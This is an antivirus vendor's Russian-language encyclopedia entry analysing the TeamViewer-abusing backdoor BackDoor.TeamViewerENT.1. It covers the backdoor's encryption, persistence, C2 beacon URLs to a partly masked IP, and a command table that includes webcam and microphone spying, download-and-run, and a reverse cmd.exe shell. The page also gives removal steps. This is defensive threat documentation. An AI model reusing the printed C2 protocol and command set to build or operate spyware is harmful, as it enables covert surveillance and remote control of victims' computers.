Защити созданное

Другие наши ресурсы

  • free.drweb.ru — бесплатные утилиты, плагины, информеры
  • av-desk.com — интернет-сервис для поставщиков услуг Dr.Web AV-Desk
  • curenet.drweb.ru — сетевая лечащая утилита Dr.Web CureNet!
  • www.drweb.ru/web-iq — ВебIQметр
Закрыть

Библиотека
Моя библиотека

+ Добавить в библиотеку

Моя библиотека

Поддержка
Круглосуточная поддержка

Позвоните

Бесплатно по России:
8-800-333-79-32

Форум

Ваши запросы

  • Все: -
  • Незакрытые: -
  • Последний: -

Позвоните

Бесплатно по России:
8-800-333-79-32 | Skype

Свяжитесь с нами

Профиль

Профиль

BackDoor.TeamViewerENT.1

Добавлен в вирусную базу Dr.Web:2016-08-15
Описание добавлено:2016-08-15

SHA1:

  • 001c13d05841d2a82229a35fe58235743f1564fe (dropper)
  • 0660cadef21d2061e776e4bcaa6aa4fb48a778be (avicap32.dll)

Троянец-бэкдор для Microsoft Windows, имеет самоназвание Spy-Agent. Для шпионажа использует компоненты программы удаленного администрирования TeamViewer. Троянец имеет три зашифрованных блока исполняемого кода, которые расшифровываются последовательно. Первый блок зашифрован с использованием BASE64 и XOR, остальные - BASE64 + RC4.

Основной вредоносный функционал сосредоточен в библиотеке avicap32.dll. После запуска троянец отключает показ ошибок для приложения TeamViewer. После чтения конфигурации зашифровывает ее локальным ключом и сохраняет в прежнее место. Устанавливает перехваты вызовов функций в адресном пространстве TeamViewer. Устанавливает атрибуты «скрытый», «системный» и «только для чтения» всем файлам в собственной папке.

Троянец имеет список контрольных сумм файлов TeamViewer и регулярно проверяет их с помощью функции API MapFileAndCheckSumA. Если для нормальной работы TeamViewer на атакованном компьютере не хватает каких-либо файлов или компонентов, троянец скачивает их со своего управляющего сервера. Для обеспечения автоматической загрузки троянец модифицирует соответствующие ветви системного реестра Windows, выбирая при этом ветви реестра HKCU или HKLM в зависимости от наличия или отсутствия административных прав.

Также троянец удаляет файл tvicap32.dll. Запускает отдельный поток, который «убивает» процессы TeamViewer, если на инфицированной машине будет запущен процесс TASKMGR.EXE или PROCEXP.EXE.

Вредоносная программа может использовать дополнительные модули-плагины, хранящиеся в файлах с расширением .pg в той же папке, где расположен троянец. Для их запуска бэкдор обходит собственную папку в поиске .pg-файлов, и при их обнаружении запускает несколько потоков (по количеству найденных файлов), которые расшифровывают эти файлы с использованием алгоритма RC4 и загружают их в память.

Для передачи сообщения о собственном состоянии троянец определяет положение курсора и по истечении указанного в конфигурации количества секунд отправляет на управляющий сервер следующий запрос:

http://188.***.***.27/windiws/update/gate.php?id=<TV_ID>&stat=<botId>&sidl=<cur_time>

Где адрес взят из конфигурации, <TV_ID> - ID TeamViewer, <botId> - уникальный идентификатор зараженного компьютера, <cur_time> - текущее время в формате "YYYY-MM-DD hh:mm:ss".

Дальнейшие запросы отправляются только в случае смены позиции курсора или если на компьютере нажата одна из следующих клавиш: VK_RETURN, VK_SPACE, VK_SHIFT. Тогда выполняется запрос:

http://188.***.***.27/windiws/update/gate.php?id=<TV_ID>&stat=<botId>&eidl=<cur_time>?cidl=<uptime>

Где адрес взят из конфигурации, <TV_ID> - ID TeamViewer, <botId> - уникальный идентификатор зараженного компьютера, <cur_time> - текущее время в формате "YYYY-MM-DD hh:mm:ss", - время работы бэкдора в режиме простоя в секундах (с момента отправки последнего запроса серверу).

Для получения заданий от управляющего сервера троянец ожидает заданное в параметрах конфигурации количество секунд, после чего отсылает на управляющий сервер следующий запрос:

http://188.***.***.27/windiws/update/gate.php?id=<TV_ID>&stat=<botId>&cidl=<uptime>

Где адрес взят из конфигурации, <TV_ID> - ID TeamViewer, <botId> - уникальный идентификатор зараженного компьютера, <uptime> - время работы бэкдора в режиме простоя в секундах (с момента отправки последнего запроса серверу).

В полученном с управляющего сервера ответе троянец ищет знак "!" - это маркер начала команды. Затем он разбивает строку на массив строк с разделителями ';', '\r'. Первая строка в полученном массиве является командой.

После выполнения команд на сервер отправляется следующий запрос:

http://188.***.***.27/windiws/update/gate.php?id=<TV_ID>&stat=<botId>&cmd=&device=2

Троянец может выполнять следующие команды:

КомандаОписание
shutdownПерезагрузить ПК
poweroffВыключить ПК
delprocУдалить TeamViewer
restartПерезапустить TeamViewer
startaudioНачать прослушивание звука с микрофона
stopaudioЗавершить прослушивание звука с микрофона
startvideoНачать просмотр через веб-камеру
stopvideoЗавершить просмотр через веб-камеру
lexecСкачать файл во временную папку (%TEMP%) и запустить его
updefОбновить конфигурационный файл или файл троянца
vidОпределить наличие веб-камеры
cmdПодключиться по указанному адресу, после чего запустить cmd.exe с перенаправлением ввода-вывода на удаленный хост
delpgУдалить плагин с диска
uppgСкачать/обновить плагин
upcfgpgЗаменить конфигурационный файл плагина на указанный в команде
oftvdelПереименовать avicap32.dll в tvicap32.dll
noexitУстановить значение параметра в единицу
cfgaudio Установить значение для соответствующего параметра в конфигурации
cfgvideo
cfgnomedia
cfghostfile
cfgwin7kill
cfgxpkill
cfgpgkey
fakedel
cfgpassteam
cfg
cfgnoexit
Cfggenid

Новость о троянце

Рекомендации по лечению

  1. В случае если операционная система способна загрузиться (в штатном режиме или режиме защиты от сбоев), скачайте лечащую утилиту Dr.Web CureIt! и выполните с ее помощью полную проверку вашего компьютера, а также используемых вами переносных носителей информации.
  2. Если загрузка операционной системы невозможна, измените настройки BIOS вашего компьютера, чтобы обеспечить возможность загрузки ПК с компакт-диска или USB-накопителя. Скачайте образ аварийного диска восстановления системы Dr.Web® LiveDisk или утилиту записи Dr.Web® LiveDisk на USB-накопитель, подготовьте соответствующий носитель. Загрузив компьютер с использованием данного носителя, выполните его полную проверку и лечение обнаруженных угроз.
Демо бесплатно

На 1 месяц (без регистрации) или 3 месяца (с регистрацией и скидкой на продление)

Скачать Dr.Web

По серийному номеру

Выполните полную проверку системы с использованием Антивируса Dr.Web Light для macOS. Данный продукт можно загрузить с официального сайта Apple App Store.

Демо бесплатно

На 1 месяц (без регистрации) или 3 месяца (с регистрацией и скидкой на продление)

Скачать Dr.Web

По серийному номеру

На загруженной ОС выполните полную проверку всех дисковых разделов с использованием продукта Антивирус Dr.Web для Linux.

Демо бесплатно

На 1 месяц (без регистрации) или 3 месяца (с регистрацией и скидкой на продление)

Скачать Dr.Web

По серийному номеру

  1. Если мобильное устройство функционирует в штатном режиме, загрузите и установите на него бесплатный антивирусный продукт Dr.Web для Android Light. Выполните полную проверку системы и используйте рекомендации по нейтрализации обнаруженных угроз.
  2. Если мобильное устройство заблокировано троянцем-вымогателем семейства Android.Locker (на экране отображается обвинение в нарушении закона, требование выплаты определенной денежной суммы или иное сообщение, мешающее нормальной работе с устройством), выполните следующие действия:
    • загрузите свой смартфон или планшет в безопасном режиме (в зависимости от версии операционной системы и особенностей конкретного мобильного устройства эта процедура может быть выполнена различными способами; обратитесь за уточнением к инструкции, поставляемой вместе с приобретенным аппаратом, или напрямую к его производителю);
    • после активации безопасного режима установите на зараженное устройство бесплатный антивирусный продукт Dr.Web для Android Light и произведите полную проверку системы, выполнив рекомендации по нейтрализации обнаруженных угроз;
    • выключите устройство и включите его в обычном режиме.

Подробнее о Dr.Web для Android

Демо бесплатно на 14 дней

Выдаётся при установке

Российский разработчик антивирусов Dr.Web

Опыт разработки с 1992 года

Dr.Web пользуются в 200+ странах мира

Dr.Web в Реестре Отечественного ПО

Поставка антивируса как услуги с 2007 года

Круглосуточная поддержка на русском языке

© «Доктор Веб»
2003 — 2018

«Доктор Веб» — российский производитель антивирусных средств защиты информации под маркой Dr.Web. Продукты Dr.Web разрабатываются с 1992 года.

125040, Россия, Москва, 3-я улица Ямского поля, вл.2, корп.12А